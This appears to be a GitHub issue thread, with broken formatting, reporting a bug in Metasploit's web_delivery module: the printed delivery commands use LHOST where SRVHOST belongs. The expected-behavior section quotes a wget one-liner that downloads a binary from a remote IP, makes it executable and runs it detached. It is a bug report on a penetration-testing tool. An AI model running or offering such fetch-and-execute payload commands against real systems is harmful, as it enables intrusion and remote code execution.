Open jeffmcjunkin opened 2 years ago
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Beep boop. This issue is not stale, and I encountered it again two weeks ago.
I haven't had a cycle to look into this or verify it yet, but if it's a regression in behavior then potentially https://github.com/rapid7/metasploit-framework/pull/16250 may be related
I haven't had a cycle to look into this or verify it yet, but if it's a regression in behavior then potentially #16250 may be related
I'm having the same issue, the value of srvhost will be overridden by lhost anyway, and the way of #16250 will not get any improvement
Steps to reproduce
On a recent penetration test I was limited to very few outbound ports per public IP, so I set up
exploit/multi/script/web_delivery
to deliver a payload to a second machine (configuring LHOST to that other machine and catching it there withexploit/multi/handler
).However, I didn't notice at first that the
SRVHOST
variable isn't reflected properly in the output instructions -- it's there substituted with theLHOST
variable. Manually swapping the IP address in thepython
,wget
, etc output from the incorrectLHOST
to the correctSRVHOST
resolved the issue, but it's worth fixing in the actual module.Encountered on Ubuntu 20.04 x64 on the latest nightly Metasploit installer.
Expected behavior
The provided output (in the above snippet, that'd be
wget -qO PEpx3AGM --no-check-certificate http://2.2.2.2:8080/CMFQe7Yzl40p; chmod +x PEpx3AGM; ./PEpx3AGM& disown
) should have the URL ashttp://1.1.1.1:8080/CMFQe7Yzl40p
.Metasploit version